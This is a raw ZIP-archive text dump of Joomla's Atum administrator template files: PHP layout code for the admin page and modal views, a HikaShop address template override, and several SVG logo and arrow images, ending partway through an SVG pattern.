			<?php $dropdownPosition = Factory::getLanguage()->isRtl() ? 'start' : 'end'; ?>
			<div class="module-actions dropdown">
				<button type="button" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn" id="dropdownMenuButton-<?php echo $id; ?>">
					<span class="icon-cogs" aria-hidden="true"></span>
					<span class="visually-hidden"><?php echo Text::sprintf('JACTION_EDIT_MODULE', $module->title); ?></span>
				</button>
				<div class="dropdown-menu dropdown-menu-<?php echo $dropdownPosition; ?>" aria-labelledby="dropdownMenuButton-<?php echo $id; ?>">
					<?php if ($canEdit) : ?>
						<?php $uri = Uri::getInstance(); ?>
						<?php $url = Route::_('index.php?option=com_modules&task=module.edit&id=' . $id . '&return=' . base64_encode($uri)); ?>
						<a class="dropdown-item" href="<?php echo $url; ?>"><?php echo Text::_('JACTION_EDIT'); ?></a>
					<?php endif; ?>
					<?php if ($canChange) : ?>
						<button type="button" class="dropdown-item unpublish-module" data-module-id="<?php echo $id; ?>"><?php echo Text::_('JACTION_UNPUBLISH'); ?></button>
					<?php endif; ?>
				</div>
			</div>
		<?php endif; ?>
		<?php if ($module->showtitle) : ?>
			<<?php echo $headerTag; ?> class="card-header<?php echo $headerClass; ?>"><?php echo $module->title; ?></<?php echo $headerTag; ?>>
		<?php endif; ?>
		<div class="module-body">
			<?php echo $module->content; ?>
		</div>
	</<?php echo $moduleTag; ?>>
</div>
PK!�&�W��1atum/html/com_hikashop/order/address_template.phpnu�[���<?php
 defined('_JEXEC') or die('Restricted access');
?>
{address_company}
{address_title} {address_firstname} {address_lastname}PK!���~!!atum/index.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 * @copyright   (C) 2016 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       4.0.0
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Layout\LayoutHelper;
use Joomla\CMS\Router\Route;
use Joomla\CMS\Uri\Uri;

/** @var \Joomla\CMS\Document\HtmlDocument $this */

$app   = Factory::getApplication();
$input = $app->input;
$wa    = $this->getWebAssetManager();

// Detecting Active Variables
$option       = $input->get('option', '');
$view         = $input->get('view', '');
$layout       = $input->get('layout', 'default');
$task         = $input->get('task', 'display');
$cpanel       = $option === 'com_cpanel' || ($option === 'com_admin' && $view === 'help');
$hiddenMenu   = $app->input->get('hidemainmenu');
$sidebarState = $input->cookie->get('atumSidebarState', '');

// Getting user accessibility settings
$a11y_mono      = (bool) $app->getIdentity()->getParam('a11y_mono', '');
$a11y_contrast  = (bool) $app->getIdentity()->getParam('a11y_contrast', '');
$a11y_highlight = (bool) $app->getIdentity()->getParam('a11y_highlight', '');
$a11y_font      = (bool) $app->getIdentity()->getParam('a11y_font', '');

// Browsers support SVG favicons
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon.svg', '', [], true, 1), 'icon', 'rel', ['type' => 'image/svg+xml']);
$this->addHeadLink(HTMLHelper::_('image', 'favicon.ico', '', [], true, 1), 'alternate icon', 'rel', ['type' => 'image/vnd.microsoft.icon']);
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon-pinned.svg', '', [], true, 1), 'mask-icon', 'rel', ['color' => '#000']);

// Template params
$logoBrandLarge  = $this->params->get('logoBrandLarge')
	? Uri::root() . htmlspecialchars($this->params->get('logoBrandLarge'), ENT_QUOTES)
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/brand-large.svg';
$logoBrandSmall = $this->params->get('logoBrandSmall')
	? Uri::root() . htmlspecialchars($this->params->get('logoBrandSmall'), ENT_QUOTES)
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/brand-small.svg';

$logoBrandLargeAlt = empty($this->params->get('logoBrandLargeAlt')) && empty($this->params->get('emptyLogoBrandLargeAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('logoBrandLargeAlt'), ENT_COMPAT, 'UTF-8') . '"';
$logoBrandSmallAlt = empty($this->params->get('logoBrandSmallAlt')) && empty($this->params->get('emptyLogoBrandSmallAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('logoBrandSmallAlt'), ENT_COMPAT, 'UTF-8') . '"';

// Get the hue value
preg_match('#^hsla?\(([0-9]+)[\D]+([0-9]+)[\D]+([0-9]+)[\D]+([0-9](?:.\d+)?)?\)$#i', $this->params->get('hue', 'hsl(214, 63%, 20%)'), $matches);

// Enable assets
$wa->usePreset('template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr'))
	->useStyle('template.active.language')
	->useStyle('template.user')
	->addInlineStyle(':root {
		--hue: ' . $matches[1] . ';
		--template-bg-light: ' . $this->params->get('bg-light', '#f0f4fb') . ';
		--template-text-dark: ' . $this->params->get('text-dark', '#495057') . ';
		--template-text-light: ' . $this->params->get('text-light', '#ffffff') . ';
		--template-link-color: ' . $this->params->get('link-color', '#2a69b8') . ';
		--template-special-color: ' . $this->params->get('special-color', '#001B4C') . ';
	}');

// Override 'template.active' asset to set correct ltr/rtl dependency
$wa->registerStyle('template.active', '', [], [], ['template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr')]);

// Set some meta data
$this->setMetaData('viewport', 'width=device-width, initial-scale=1');

$monochrome = (bool) $this->params->get('monochrome');

Text::script('TPL_ATUM_MORE_ELEMENTS');

// @see administrator/templates/atum/html/layouts/status.php
$statusModules = LayoutHelper::render('status', ['modules' => 'status']);
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"<?php echo $a11y_font ? ' class="a11y_font"' : ''; ?>>
<head>
	<jdoc:include type="metas" />
	<jdoc:include type="styles" />
	<jdoc:include type="scripts" />
</head>

<body class="admin <?php echo $option . ' view-' . $view . ' layout-' . $layout . ($task ? ' task-' . $task : '') . ($monochrome || $a11y_mono ? ' monochrome' : '') . ($a11y_contrast ? ' a11y_contrast' : '') . ($a11y_highlight ? ' a11y_highlight' : ''); ?>">
<noscript>
	<div class="alert alert-danger" role="alert">
		<?php echo Text::_('JGLOBAL_WARNJAVASCRIPT'); ?>
	</div>
</noscript>

<jdoc:include type="modules" name="customtop" style="none" />

<?php // Header ?>
<header id="header" class="header">
	<div class="header-inside">
		<div class="header-title d-flex">
			<div class="d-flex align-items-center">
				<?php // No home link in edit mode (so users can not jump out) and control panel (for a11y reasons) ?>
				<?php if ($hiddenMenu || $cpanel) : ?>
					<div class="logo <?php echo $sidebarState === 'closed' ? 'small' : ''; ?>">
					<img src="<?php echo $logoBrandLarge; ?>" <?php echo $logoBrandLargeAlt; ?>>
					<img class="logo-collapsed" src="<?php echo $logoBrandSmall; ?>" <?php echo $logoBrandSmallAlt; ?>>
					</div>
				<?php else : ?>
					<a class="logo <?php echo $sidebarState === 'closed' ? 'small' : ''; ?>" href="<?php echo Route::_('index.php'); ?>">
						<img src="<?php echo $logoBrandLarge; ?>" alt="<?php echo Text::_('TPL_ATUM_BACK_TO_CONTROL_PANEL'); ?>">
						<img class="logo-collapsed" src="<?php echo $logoBrandSmall; ?>" alt="<?php echo Text::_('TPL_ATUM_BACK_TO_CONTROL_PANEL'); ?>">
					</a>
				<?php endif; ?>
			</div>
			<jdoc:include type="modules" name="title" />
		</div>
		<?php echo $statusModules; ?>
	</div>
</header>

<?php // Wrapper ?>
<div id="wrapper" class="d-flex wrapper<?php echo $hiddenMenu ? '0' : ''; ?> <?php echo $sidebarState; ?>">
	<?php // Sidebar ?>
	<?php if (!$hiddenMenu) : ?>
	<?php HTMLHelper::_('bootstrap.collapse', '.toggler-burger'); ?>
		<button class="navbar-toggler toggler-burger collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#sidebar-wrapper" aria-controls="sidebar-wrapper" aria-expanded="false" aria-label="<?php echo Text::_('JTOGGLE_SIDEBAR_MENU'); ?>">
			<span class="navbar-toggler-icon"></span>
		</button>

		<div id="sidebar-wrapper" class="sidebar-wrapper sidebar-menu" <?php echo $hiddenMenu ? 'data-hidden="' . $hiddenMenu . '"' : ''; ?>>
			<div id="sidebarmenu" class="sidebar-sticky">
				<div class="sidebar-toggle item item-level-1">
					<a id="menu-collapse" href="#" aria-label="<?php echo Text::_('JTOGGLE_SIDEBAR_MENU'); ?>">
						<span id="menu-collapse-icon" class="<?php echo $sidebarState === 'closed' ? 'icon-toggle-on' : 'icon-toggle-off'; ?> icon-fw" aria-hidden="true"></span>
						<span class="sidebar-item-title"><?php echo Text::_('JTOGGLE_SIDEBAR_MENU'); ?></span>
					</a>
				</div>
				<jdoc:include type="modules" name="menu" style="none" />
			</div>
		</div>
	<?php endif; ?>

	<?php // container-fluid ?>
	<div class="container-fluid container-main">
		<?php if (!$cpanel) : ?>
			<?php // Subheader ?>
			<?php HTMLHelper::_('bootstrap.collapse', '.toggler-toolbar'); ?>
			<button class="navbar-toggler toggler-toolbar toggler-burger collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#subhead-container" aria-controls="subhead-container" aria-expanded="false" aria-label="<?php echo Text::_('TPL_ATUM_TOOLBAR'); ?>">
				<span class="toggler-toolbar-icon"></span>
			</button>
			<div id="subhead-container" class="subhead mb-3">
				<div class="row">
					<div class="col-md-12">
						<jdoc:include type="modules" name="toolbar" style="none" />
					</div>
				</div>
			</div>
		<?php endif; ?>
		<section id="content" class="content">
			<?php // Begin Content ?>
			<jdoc:include type="modules" name="top" style="html5" />
			<div class="row">
				<div class="col-md-12">
					<main>
						<jdoc:include type="message" />
						<jdoc:include type="component" />
					</main>
				</div>
				<?php if ($this->countModules('bottom')) : ?>
					<jdoc:include type="modules" name="bottom" style="html5" />
				<?php endif; ?>
			</div>
			<?php // End Content ?>
		</section>
	</div>
</div>
<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>
PK!�5���atum/component.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\HTML\HTMLHelper;

/** @var \Joomla\CMS\Document\HtmlDocument $this */

$wa = $this->getWebAssetManager();

// Get the hue value
preg_match('#^hsla?\(([0-9]+)[\D]+([0-9]+)[\D]+([0-9]+)[\D]+([0-9](?:.\d+)?)?\)$#i', $this->params->get('hue', 'hsl(214, 63%, 20%)'), $matches);

// Enable assets
$wa->usePreset('template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr'))
	->useStyle('template.active.language')
	->useStyle('template.user')
	->addInlineStyle(':root {
		--hue: ' . $matches[1] . ';
		--template-bg-light: ' . $this->params->get('bg-light', '--template-bg-light') . ';
		--template-text-dark: ' . $this->params->get('text-dark', '--template-text-dark') . ';
		--template-text-light: ' . $this->params->get('text-light', '--template-text-light') . ';
		--template-link-color: ' . $this->params->get('link-color', '--template-link-color') . ';
		--template-special-color: ' . $this->params->get('special-color', '--template-special-color') . ';
	}');

// No template.js for modals
$wa->disableScript('template.atum');

// Override 'template.active' asset to set correct ltr/rtl dependency
$wa->registerStyle('template.active', '', [], [], ['template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr')]);

// Browsers support SVG favicons
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon.svg', '', [], true, 1), 'icon', 'rel', ['type' => 'image/svg+xml']);
$this->addHeadLink(HTMLHelper::_('image', 'favicon.ico', '', [], true, 1), 'alternate icon', 'rel', ['type' => 'image/vnd.microsoft.icon']);
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon-pinned.svg', '', [], true, 1), 'mask-icon', 'rel', ['color' => '#000']);

?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="metas" />
	<jdoc:include type="styles" />
	<jdoc:include type="scripts" />
</head>
<body class="contentpane component">
	<jdoc:include type="message" />
	<jdoc:include type="component" />
</body>
</html>
PK!Տ���� atum/images/select-bg-active.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1854.54 295" preserveAspectRatio="xMinYMid" width="1854.54" height="295"><path d="M1825.1,145.7l6.9,6.9c0.1,0.1,0.2,0.1,0.3,0.1c0.1,0,0.2,0,0.3-0.1l6.9-6.9c0.1-0.1,0.1-0.2,0.1-0.3c0-0.1,0-0.2-0.1-0.3l-0.7-0.7c-0.1-0.1-0.2-0.1-0.3-0.1s-0.2,0-0.3,0.1l-5.8,5.8l-5.8-5.8c-0.1-0.1-0.2-0.1-0.3-0.1c-0.1,0-0.2,0-0.3,0.1l-0.7,0.7c-0.1,0.1-0.1,0.2-0.1,0.3C1824.9,145.5,1825,145.6,1825.1,145.7z" fill="#fff"/></svg>
PK!�����$atum/images/select-bg-active-rtl.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1854.54 295" preserveAspectRatio="xMinYMid" width="1854.54" height="295"><path d="m14.47 145.7 6.898 6.899c0.102 0.101 0.199 0.101 0.3 0.101 0.102 0 0.2 0 0.302-0.101l6.898-6.899c0.102-0.1 0.102-0.2 0.102-0.3s0-0.2-0.102-0.3l-0.7-0.7c-0.101-0.1-0.198-0.1-0.3-0.1-0.101 0-0.2 0-0.301 0.1l-5.8 5.8-5.801-5.8c-0.101-0.1-0.199-0.1-0.301-0.1-0.101 0-0.199 0-0.301 0.1l-0.699 0.7c-0.101 0.1-0.101 0.2-0.101 0.3-0.294 0.1-0.194 0.2-0.094 0.3z" fill="#fff"/></svg>
PK!K��Z��atum/images/select-bg-rtl.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" width="1854.539" height="295" preserveAspectRatio="xMinYMin meet"><path d="M13.573 145.7l6.9 6.9c.1.1.2.1.3.1s.2 0 .3-.1l6.9-6.9c.1-.1.1-.2.1-.3s0-.2-.1-.3l-.7-.7c-.1-.1-.2-.1-.3-.1s-.2 0-.3.1l-5.8 5.8-5.8-5.8c-.1-.1-.2-.1-.3-.1s-.2 0-.3.1l-.7.7c-.1.1-.1.2-.1.3-.296.1-.195.2-.096.3h-.002z"/><path fill="#fff" d="M44.54 0h1810v295h-1810z"/></svg>
PK!g0=�XXatum/images/logos/login.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" width="71.145" height="71.048"><path fill="#7ac143" d="M12.71 35.762l-1.327-1.328C7.114 30.166 5.882 24.2 7.4 18.783 3.13 17.833 0 14.04 0 9.486 0 4.27 4.27 0 9.486 0c4.742 0 8.632 3.414 9.392 7.97 5.12-1.233 10.718.19 14.702 4.174l.57.568-7.02 7.02-.57-.568a5.84 5.84 0 0 0-8.253 0 5.84 5.84 0 0 0 0 8.252L34.055 43.16l-7.02 7.02-7.4-7.398-6.925-7.02z"/><path fill="#f9a541" d="M20.585 27.982L36.33 12.237c4.175-4.175 10.245-5.502 15.557-3.984.665-4.647 4.648-8.157 9.39-8.157 5.217 0 9.485 4.268 9.485 9.484 0 4.838-3.604 8.822-8.25 9.39 1.518 5.313.188 11.29-3.984 15.463l-.57.568-6.83-7.02.568-.568a5.84 5.84 0 0 0 0-8.252 5.84 5.84 0 0 0-8.251 0l-1.33 1.326-14.42 14.42-7.114-6.925z"/><path fill="#f44321" d="M52.172 63.365c-5.407 1.613-11.478.38-15.745-3.89l-.57-.568 7.02-7.02.57.568a5.84 5.84 0 0 0 8.251 0 5.84 5.84 0 0 0 0-8.252L35.953 28.457l7.02-7.02 15.842 15.84c3.982 3.984 5.405 9.676 4.172 14.893 4.65.664 8.16 4.648 8.16 9.39 0 5.22-4.27 9.486-9.486 9.486-4.745-.093-8.634-3.414-9.488-7.683z"/><path fill="#5091cd" d="M49.42 43.634L33.675 59.382c-4.08 4.078-9.77 5.406-14.893 4.172-.948 4.27-4.743 7.4-9.296 7.4-5.218 0-9.486-4.27-9.486-9.486 0-4.46 3.13-8.254 7.305-9.2-1.328-5.312 0-11.004 4.08-15.082l.568-.57 7.02 7.02-.568.57a5.84 5.84 0 0 0 0 8.252 5.84 5.84 0 0 0 8.252 0L42.402 36.7l7.02 6.924z"/></svg>PK!��Q

!atum/images/logos/brand-large.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 376.3 74.8" x="0" y="0" width="150">
	<g>
		<path fill="#fff" d="M116.4 14.8v31.3c0 2.8.2 5.4-2.3 7.3-2.3 1.9-6.2 2.5-10.4 2.5-6.4 0-13.2-1.5-13.2-1.5l-1.5 4s9.5 2 16.4 2.1c5.8.1 10.9-1.2 13.7-4.4 2.3-2.6 3-5.6 2.9-10.7V14.8h-5.6M163.1 32.1c-4.2-2.3-9.3-3.5-15.1-3.5-5.7 0-10.8 1.2-15.1 3.5-5.4 2.9-8.1 7.2-8.1 12.6 0 5.4 2.7 9.7 8.1 12.6 4.3 2.3 9.3 3.5 15.1 3.5 5.7 0 10.8-1.2 15-3.5 5.4-2.9 8.1-7.2 8.1-12.6.1-5.5-2.7-9.7-8-12.6m-3.3 22c-3.3 1.9-7.2 2.8-11.8 2.8-4.7 0-8.7-.9-11.9-2.7-3.9-2.2-5.8-5.3-5.8-9.5 0-4.1 2-7.3 5.8-9.5 3.2-1.8 7.2-2.7 11.9-2.7 4.6 0 8.6.9 11.9 2.7 3.8 2.2 5.8 5.4 5.8 9.5 0 4-2 7.2-5.9 9.4zM212.3 32.1c-4.2-2.3-9.3-3.5-15.1-3.5-5.7 0-10.8 1.2-15.1 3.5-5.4 2.9-8.1 7.2-8.1 12.6 0 5.4 2.7 9.7 8.1 12.6 4.3 2.3 9.3 3.5 15.1 3.5 5.7 0 10.8-1.2 15-3.5 5.4-2.9 8.1-7.2 8.1-12.6.1-5.5-2.6-9.7-8-12.6m-3.2 22c-3.3 1.9-7.2 2.8-11.8 2.8-4.7 0-8.7-.9-11.9-2.7-3.9-2.2-5.8-5.3-5.8-9.5 0-4.1 2-7.3 5.8-9.5 3.2-1.8 7.2-2.7 11.9-2.7 4.6 0 8.6.9 11.9 2.7 3.8 2.2 5.8 5.4 5.8 9.5-.1 4-2.1 7.2-5.9 9.4zM280.2 31.3c-3-1.8-6.9-2.7-11.5-2.7-5.9 0-10.6 1.8-14.2 5.4-3.4-3.6-8.2-5.4-14.1-5.4-4.8 0-8.7 1-11.7 2.9V29h-5.3v31.1h5.3V38.9c.4-1.5 1.4-2.9 3-4.1 2.2-1.5 5-2.3 8.5-2.3 3.1 0 5.7.6 7.9 1.9 2.6 1.5 3.8 3.5 3.8 6.3v19.6h5.2V40.6c0-2.8 1.2-4.8 3.8-6.3 2.2-1.2 4.9-1.9 8-1.9 3.1 0 5.8.6 8 1.9 2.6 1.5 3.8 3.5 3.8 6.3v19.6h5.3V41.3c-.1-4.4-2-7.8-5.8-10M290.2 14.8v45.4h5.3V14.8h-5.3M354.5 14.8v35.1h5.3V14.8h-5.3M340.7 29v5.3c-4.5-3.8-10.5-5.8-17.9-5.8-5.9 0-11 1.1-15.2 3.4-5.2 2.9-7.9 7.1-7.9 12.7 0 5.5 2.7 9.8 8.1 12.6 4.2 2.3 9.3 3.4 15.2 3.4 2.9 0 5.8-.3 8.4-1 3.7-1 6.8-2.4 9.2-4.3v4.8h5.3V29h-5.2m-35.5 15.7c0-4.1 2-7.3 5.8-9.5 3.2-1.8 7.3-2.7 12-2.7 5.8 0 10.3 1.4 13.5 4.2 2.8 2.5 4.2 5.7 4.2 9.6V50c-2.2 2.5-5.5 4.4-9.7 5.7-2.5.8-5.2 1.2-8 1.2-4.8 0-8.8-.9-12-2.6-3.9-2.3-5.8-5.4-5.8-9.6zM357.2 54.3c-3.7 0-4.2 1.9-4.2 3.1 0 1.2.6 3.1 4.2 3.1 3.7 0 4.2-2 4.2-3.1s-.5-3.1-4.2-3.1zM376.3 20.4c0 3.1-2 5.7-5.6 5.7-3.6 0-5.6-2.6-5.6-5.7s2-5.7 5.6-5.7c3.6 0 5.6 2.6 5.6 5.7zm-10 0c0 2.6 1.6 4.6 4.4 4.6 2.8 0 4.4-2 4.4-4.6 0-2.6-1.6-4.6-4.4-4.6-2.8 0-4.4 2-4.4 4.6zm5.5.7c2.2-.4 2-3.7-.5-3.7h-2.7v5.8h1.1v-2h1l1.6 2h1.2V23l-1.7-1.9zm-.6-2.7c1.3 0 1.3 1.9 0 1.9h-1.6v-1.9h1.6z"/>
	</g>
	<g>
		<path fill="#fff" d="M13.5 37.7L12 36.3c-4.5-4.5-5.8-10.8-4.2-16.5-4.5-1-7.8-5-7.8-9.8C0 4.5 4.5 0 10 0c5 0 9.1 3.6 9.9 8.4 5.4-1.3 11.3.2 15.5 4.4l.6.6-7.4 7.4-.6-.6c-2.4-2.4-6.3-2.4-8.7 0-2.4 2.4-2.4 6.3 0 8.7l1.4 1.4 7.4 7.4 7.8 7.8-7.4 7.4-7.8-7.8-7.2-7.4z"/>
		<path fill="#fff" d="M21.8 29.5l7.8-7.8 7.4-7.4 1.4-1.4C42.9 8.4 49.2 7 54.8 8.6c.7-4.8 4.9-8.6 10-8.6 5.5 0 10 4.5 10 10 0 5.1-3.8 9.3-8.7 9.9 1.6 5.6.2 11.9-4.2 16.3l-.6.6-7.4-7.4.6-.6c2.4-2.4 2.4-6.3 0-8.7-2.4-2.4-6.3-2.4-8.7 0l-1.4 1.4L37 29l-7.8 7.8-7.4-7.3z"/>
		<path fill="#fff" d="M55 66.8c-5.7 1.7-12.1.4-16.6-4.1l-.6-.6 7.4-7.4.6.6c2.4 2.4 6.3 2.4 8.7 0 2.4-2.4 2.4-6.3 0-8.7L53 45.1l-7.4-7.4-7.8-7.8 7.4-7.4 7.8 7.8 7.4 7.4 1.5 1.5c4.2 4.2 5.7 10.2 4.4 15.7 4.9.7 8.6 4.9 8.6 9.9 0 5.5-4.5 10-10 10-4.9 0-8.9-3.5-9.9-8z"/>
		<path fill="#fff" d="M52.2 46l-7.8 7.8-7.4 7.4-1.4 1.4c-4.3 4.3-10.3 5.7-15.7 4.4-1 4.5-5 7.8-9.8 7.8-5.5 0-10-4.5-10-10C0 60 3.3 56.1 7.7 55c-1.4-5.5.1-11.5 4.3-15.8l.6-.6L20 46l-.6.6c-2.4 2.4-2.4 6.3 0 8.7 2.4 2.4 6.3 2.4 8.7 0l1.4-1.4 7.4-7.4 7.8-7.8 7.5 7.3z"/>
	</g>
</svg>
PK!x@Q��!atum/images/logos/brand-small.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 149.7 149.6" transform="scale(1)" width="20px" height="20px"><path fill="#fff" d="M141.4 42v.5H140V46h-.5v-3.5h-1.3V42h3.2z"/><path fill="#fff"  d="M141.8 42h.8l1.1 3.3 1.1-3.3h.8v3.9h-.5v-2.3-.4-.6l-1.1 3.3h-.5l-1.1-3.3V45.8h-.5V42z"/><g><path fill="#fff" d="M27 75.5l-2.9-2.9c-8.9-8.9-11.7-21.7-8.3-33C6.9 37.6.2 29.6.2 20.1c0-11.1 9-20 20-20 10 0 18.2 7.3 19.8 16.8 10.8-2.5 22.6.4 31.1 8.8l1.2 1.2-14.9 14.7-1.1-1.2c-4.8-4.8-12.6-4.8-17.4 0-4.8 4.8-4.8 12.6 0 17.4l2.9 2.9 14.8 14.8 15.6 15.6-14.8 14.8-15.6-15.7L27 75.5z" /><path fill="#fff" d="M43.5 58.9l15.6-15.6 14.8-14.8 2.9-2.9c8.9-8.9 21.6-11.7 32.8-8.4C111 7.5 119.4 0 129.5 0c11.1 0 20 9 20 20 0 10.2-7.6 18.6-17.4 19.9 3.2 11.2.4 23.8-8.4 32.7l-1.2 1.2L107.7 59l1.1-1.1c4.8-4.8 4.8-12.6 0-17.4-4.8-4.8-12.5-4.8-17.4 0l-2.9 2.9-14.6 14.7-15.6 15.6-14.8-14.8z" /><path fill="#fff" d="M110.1 133.5c-11.4 3.5-24.2.7-33.2-8.3l-1.1-1.1 14.8-14.8 1.1 1.1c4.8 4.8 12.6 4.8 17.4 0 4.8-4.8 4.8-12.5 0-17.4l-2.9-2.9-14.9-14.6-15.6-15.7L90.5 45l15.6 15.6 14.8 14.8 2.9 2.9c8.5 8.5 11.4 20.5 8.8 31.3 9.7 1.4 17.2 9.7 17.2 19.8 0 11.1-9 20-20 20-9.8.2-17.9-6.7-19.7-15.9z" /><path fill="#fff" d="M104.3 92l-15.6 15.6-14.8 14.8-2.9 2.9c-8.5 8.5-20.6 11.4-31.5 8.7-2 8.9-10 15.5-19.5 15.5-11.1 0-20-9-20-20 0-9.5 6.6-17.4 15.4-19.5-2.8-11 .1-23.1 8.7-31.7l1.1-1.1L40 92l-1.1 1.1c-4.8 4.8-4.8 12.6 0 17.4 4.8 4.8 12.6 4.8 17.4 0l2.9-2.9L74 92.8l15.6-15.6L104.3 92z" /></g></svg>
PK!�{���atum/images/select-bg.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1854.54 295" preserveAspectRatio="xMinYMid" width="1854.54" height="295"><path d="M1825.1,145.7l6.9,6.9c0.1,0.1,0.2,0.1,0.3,0.1c0.1,0,0.2,0,0.3-0.1l6.9-6.9c0.1-0.1,0.1-0.2,0.1-0.3c0-0.1,0-0.2-0.1-0.3l-0.7-0.7c-0.1-0.1-0.2-0.1-0.3-0.1s-0.2,0-0.3,0.1l-5.8,5.8l-5.8-5.8c-0.1-0.1-0.2-0.1-0.3-0.1c-0.1,0-0.2,0-0.3,0.1l-0.7,0.7c-0.1,0.1-0.1,0.2-0.1,0.3C1824.9,145.5,1825,145.6,1825.1,145.7z" fill="#000"/><rect width="1810" height="295" fill="#fff"/></svg>
PK!\LPWatum/images/joomla-pattern.svgnu&1i�<?xml version="1.0" encoding="UTF-8"?><svg version="1.1" id="pattern-tile" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 257.9 205.7" style="enable-background:new 0 0 257.9 205.7;" xml:space="preserve" preserveAspectRatio="xMinYMid" width="257.9" height="205.7"><g opacity="0.85" ><path fill="#fff" d="M166.2,113.3c-2.7-3.2-4-6.4-4.1-10.3c0.1-4.1,1.5-7.7,4.1-10.7l26.7-27l0.2-0.2c7-7,6.9-19-0.3-26.3 c-7.2-7.1-19.3-7.3-26.3-0.3l-27.1,26.9c-3.2,2.7-6.4,4-10.3,4.1c-4.1-0.1-7.7-1.5-10.7-4.1l-27-26.7l-0.2-0.2 c-7-7-19-6.9-26.3,0.3c-7.1,7.2-7.3,19.3-0.3,26.3l26.9,27.1c2.7,3.2,4,6.4,4.1,10.3c-0.1,4.1-1.5,7.7-4.1,10.7l-26.7,27l-0.2,0.2 c-7,7-6.9,19,0.3,26.3c3.7,3.6,8.6,5.4,13.4,5.4c4.7,0,9.4-1.7,12.8-5.2l27.1-26.9c3.1-2.6,6.6-4,10.8-4.1 c3.9,0.1,7.1,1.4,10.2,4.1l27,26.7l0.2,0.2c7,7,19,6.9,26.3-0.3c7.1-7.2,7.3-19.3,0.3-26.3L166.2,113.3z M192.2,166 c-6.9,6.8-18.3,6.9-24.9,0.3l-27.2-27c-3.4-2.9-6.7-4.2-10.9-4.4h0c-4.3,0.2-8.1,1.6-11.4,4.4l-27,26.7l-0.2,0.2 c-6.6,6.6-18,6.5-24.9-0.3c-6.8-6.9-6.9-18.3-0.3-24.9l27-27.2c2.7-3.2,4.2-7.1,4.4-11.4c-0.1-4.2-1.5-7.5-4.4-10.9l-26.7-27 l-0.2-0.2c-6.6-6.6-6.5-18,0.3-24.9c3.5-3.4,8.1-5.2,12.7-5.2c4.5,0,8.9,1.6,12.1,4.9l27.2,27c3.2,2.7,7.1,4.2,11.4,4.4 c4.2-0.1,7.5-1.5,10.9-4.4l27-26.7l0.2-0.2c6.6-6.6,18-6.5,24.9,0.3c6.8,6.9,6.9,18.3,0.3,24.9l-27,27.2c-2.7,3.2-4.2,7.1-4.4,11.4 c0.1,4.2,1.5,7.5,4.4,10.9l26.7,27l0.2,0.2C199,147.8,198.9,159.2,192.2,166z"/><path fill="#fff" d="M200.3,102.9c0-31.4,25.8-57,57.4-57v-1h-0.4v0c-19.7,0.1-37.1,10-47.6,25c7.9-13.6,6.4-32.1-4.6-43.2 c-13.2-13.1-36.7-12.8-50.3,0.8l-21.3,21.9c-1.6,1.4-2.9,1.5-4.3,1.5c-1.6,0-3.3-0.1-4.8-1.5L103,27.4C89.5,13.9,66,13.5,52.7,26.6 c-10.9,11-12.5,29.1-4.9,42.7C37.3,54.6,20.1,44.9,0.6,44.9H0.1v1h0.4c31.4,0,57,25.6,57,57s-25.8,57-57.5,57v1 c19.9,0,37.4-9.9,48-24.9c-7.8,13.6-6.3,31.9,4.7,43c13.2,13.1,36.7,12.8,50.3-0.8l21.3-21.9c1.5-1.4,3.2-1.5,4.8-1.5h0 c1.4,0,2.7,0.1,4.3,1.5l21.3,21.9c6.9,6.9,16.5,10.4,25.9,10.4c9,0,17.9-3.2,24.4-9.6c11-11.1,12.5-29.4,4.7-43 c10.6,15,28.2,24.9,48,24.9v-1C226.1,159.9,200.3,134.3,200.3,102.9z M58.5,102.9c0-10.8-3-20.9-8.1-29.5c0.9,1.3,2,2.5,3.1,3.6 l21.9,21.3c1.4,1.6,1.5,2.9,1.5,4.3c0,1.6-0.1,3.3-1.5,4.8l-21.9,21.3c-1.2,1.2-2.3,2.5-3.3,3.8C55.5,123.8,58.5,113.7,58.5,102.9z M204.4,178.3c-12.9,12.8-35.7,12.4-48.9-0.8l-21.4-21.9c-1.8-1.6-3.2-1.8-4.7-1.8c-0.1,0-0.2,0-0.3,0c-1.7,0-3.7,0.2-5.5,1.8 